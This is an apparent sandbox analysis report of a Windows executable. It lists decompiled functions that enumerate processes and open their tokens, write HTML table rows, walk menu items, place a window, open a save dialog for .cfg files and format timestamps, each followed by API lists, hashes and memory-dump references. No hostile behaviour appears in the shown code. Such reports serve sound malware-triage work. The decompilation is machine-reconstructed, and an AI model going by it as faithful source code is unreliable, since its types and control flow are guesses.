				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                                0x0040598b
                                                                                                                0x0040598b
                                                                                                                0x0040599a
                                                                                                                0x004059ae
                                                                                                                0x004059b5
                                                                                                                0x004059c1
                                                                                                                0x004059c6
                                                                                                                0x004059cb
                                                                                                                0x004059ce
                                                                                                                0x00405a7b
                                                                                                                0x00405a7b
                                                                                                                0x004059d4
                                                                                                                0x004059d4
                                                                                                                0x004059dc
                                                                                                                0x004059ee
                                                                                                                0x00000000
                                                                                                                0x004059f0
                                                                                                                0x004059f0
                                                                                                                0x004059f6
                                                                                                                0x004059f7
                                                                                                                0x004059fa
                                                                                                                0x00405a03
                                                                                                                0x00405a2b
                                                                                                                0x00405a2e
                                                                                                                0x00405a3c
                                                                                                                0x00405a40
                                                                                                                0x00000000
                                                                                                                0x00405a42
                                                                                                                0x00405a42
                                                                                                                0x00405a54
                                                                                                                0x00405a59
                                                                                                                0x00405a5a
                                                                                                                0x00405a5a
                                                                                                                0x00405a61
                                                                                                                0x00405a69
                                                                                                                0x00405a7f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a69
                                                                                                                0x00405a05
                                                                                                                0x00405a0e
                                                                                                                0x00405a17
                                                                                                                0x00000000
                                                                                                                0x00405a19
                                                                                                                0x00405a19
                                                                                                                0x00405a1c
                                                                                                                0x00405a1d
                                                                                                                0x00405a20
                                                                                                                0x00405a29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a29
                                                                                                                0x00405a17
                                                                                                                0x00405a03
                                                                                                                0x00000000
                                                                                                                0x00405a6b
                                                                                                                0x00405a6e
                                                                                                                0x00405a72
                                                                                                                0x00405a72
                                                                                                                0x00000000
                                                                                                                0x004059d4
                                                                                                                0x00405a81
                                                                                                                0x00405a84
                                                                                                                0x00405a8f

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                  • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                  • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                  • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                  • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                  • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                  • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                  • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                  • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                • wcschr.MSVCRT ref: 00405A0E
                                                                                                                • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 768606695-0
                                                                                                                • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                0x00407639
                                                                                                                0x00407646
                                                                                                                0x00407647
                                                                                                                0x00407654
                                                                                                                0x0040765f
                                                                                                                0x0040765f
                                                                                                                0x0040766b
                                                                                                                0x0040766d
                                                                                                                0x00407672
                                                                                                                0x00407677
                                                                                                                0x0040767d
                                                                                                                0x00407680
                                                                                                                0x00407686
                                                                                                                0x00407691
                                                                                                                0x00407697
                                                                                                                0x00407699
                                                                                                                0x00407699
                                                                                                                0x0040769c
                                                                                                                0x0040769f
                                                                                                                0x004076a3
                                                                                                                0x004076a7
                                                                                                                0x004076ab
                                                                                                                0x004076b5
                                                                                                                0x004076be
                                                                                                                0x004076c8
                                                                                                                0x004076de
                                                                                                                0x004076ee
                                                                                                                0x004076f1
                                                                                                                0x004076f4
                                                                                                                0x004076fa
                                                                                                                0x00407708
                                                                                                                0x0040770e
                                                                                                                0x00407718
                                                                                                                0x0040771d
                                                                                                                0x00407723
                                                                                                                0x00407724
                                                                                                                0x00407727
                                                                                                                0x0040772c
                                                                                                                0x0040772f
                                                                                                                0x00407734
                                                                                                                0x0040773f
                                                                                                                0x00407744
                                                                                                                0x00407745
                                                                                                                0x0040767d
                                                                                                                0x00407760

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                0x0040605e
                                                                                                                0x00406061
                                                                                                                0x00406069
                                                                                                                0x00406074
                                                                                                                0x0040607a
                                                                                                                0x0040607e
                                                                                                                0x00406082
                                                                                                                0x00406148
                                                                                                                0x0040614e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406088
                                                                                                                0x00406088
                                                                                                                0x00406093
                                                                                                                0x00406098
                                                                                                                0x0040609f
                                                                                                                0x004060ae
                                                                                                                0x004060b6
                                                                                                                0x004060be
                                                                                                                0x004060c6
                                                                                                                0x004060ca
                                                                                                                0x004060cf
                                                                                                                0x004060d7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004060de
                                                                                                                0x00406129
                                                                                                                0x00406129
                                                                                                                0x0040612d
                                                                                                                0x0040612f
                                                                                                                0x00406130
                                                                                                                0x00406134
                                                                                                                0x00406137
                                                                                                                0x0040613c
                                                                                                                0x0040613c
                                                                                                                0x00000000
                                                                                                                0x0040612d
                                                                                                                0x004060e7
                                                                                                                0x004060f0
                                                                                                                0x004060f2
                                                                                                                0x004060f2
                                                                                                                0x004060f9
                                                                                                                0x004060fd
                                                                                                                0x00406102
                                                                                                                0x0040610c
                                                                                                                0x00406112
                                                                                                                0x00406117
                                                                                                                0x00406117
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406102
                                                                                                                0x00406122
                                                                                                                0x00406128
                                                                                                                0x00000000
                                                                                                                0x0040613f
                                                                                                                0x0040613f
                                                                                                                0x00406140
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                                0x00402bee
                                                                                                                0x00402bf8
                                                                                                                0x00402cae
                                                                                                                0x00402c08
                                                                                                                0x00402c10
                                                                                                                0x00402c11
                                                                                                                0x00402c12
                                                                                                                0x00402c13
                                                                                                                0x00402c20
                                                                                                                0x00402c27
                                                                                                                0x00402c2e
                                                                                                                0x00402c30
                                                                                                                0x00402c37
                                                                                                                0x00402c4b
                                                                                                                0x00402c50
                                                                                                                0x00402c53
                                                                                                                0x00402c55
                                                                                                                0x00402c3e
                                                                                                                0x00402c3e
                                                                                                                0x00402c41
                                                                                                                0x00402c41
                                                                                                                0x00402c5a
                                                                                                                0x00402c60
                                                                                                                0x00402c65
                                                                                                                0x00402c68
                                                                                                                0x00402c6d
                                                                                                                0x00402c77
                                                                                                                0x00402c7c
                                                                                                                0x00402c7e
                                                                                                                0x00402c87
                                                                                                                0x00402ca5
                                                                                                                0x00402ca5
                                                                                                                0x00402c87
                                                                                                                0x00402c7c
                                                                                                                0x00402c6d
                                                                                                                0x00000000
                                                                                                                0x00402cac

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 1155976603-0
                                                                                                                • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                0x004036ef
                                                                                                                0x004036f6
                                                                                                                0x0040370b
                                                                                                                0x00403712
                                                                                                                0x00403717
                                                                                                                0x0040371c
                                                                                                                0x0040371f
                                                                                                                0x0040372c
                                                                                                                0x00403735
                                                                                                                0x00403738
                                                                                                                0x00403744
                                                                                                                0x00403751
                                                                                                                0x00403758
                                                                                                                0x00403760
                                                                                                                0x00403769
                                                                                                                0x0040376c
                                                                                                                0x00403778
                                                                                                                0x0040377b
                                                                                                                0x0040378b
                                                                                                                0x00403792
                                                                                                                0x00403795
                                                                                                                0x00403798
                                                                                                                0x0040379b
                                                                                                                0x004037a2
                                                                                                                0x004037a5
                                                                                                                0x004037a8
                                                                                                                0x004037af
                                                                                                                0x004037b7
                                                                                                                0x004037c3
                                                                                                                0x00000000
                                                                                                                0x004037d4
                                                                                                                0x004037dc

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004036F6
                                                                                                                • memset.MSVCRT ref: 00403712
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                  • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                • wcscpy.MSVCRT ref: 004037C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                • String ID: L$cfg
                                                                                                                • API String ID: 275899518-3734058911
                                                                                                                • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                0x00404ed0
                                                                                                                0x00404edf
                                                                                                                0x00404ef6
                                                                                                                0x00000000
                                                                                                                0x00404f00
                                                                                                                0x00404f1c
                                                                                                                0x00404f31
                                                                                                                0x00404f41
                                                                                                                0x00404f4e
                                                                                                                0x00404f5d
                                                                                                                0x00404f66
                                                                                                                0x00404f69
                                                                                                                0x00404f69
                                                                                                                0x00404f71
                                                                                                                0x00404f77
                                                                                                                0x00404f7d

                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                • wcscpy.MSVCRT ref: 00404F41
                                                                                                                • wcscat.MSVCRT ref: 00404F4E
                                                                                                                • wcscat.MSVCRT ref: 00404F5D
                                                                                                                • wcscpy.MSVCRT ref: 00404F71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331804452-0
                                                                                                                • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
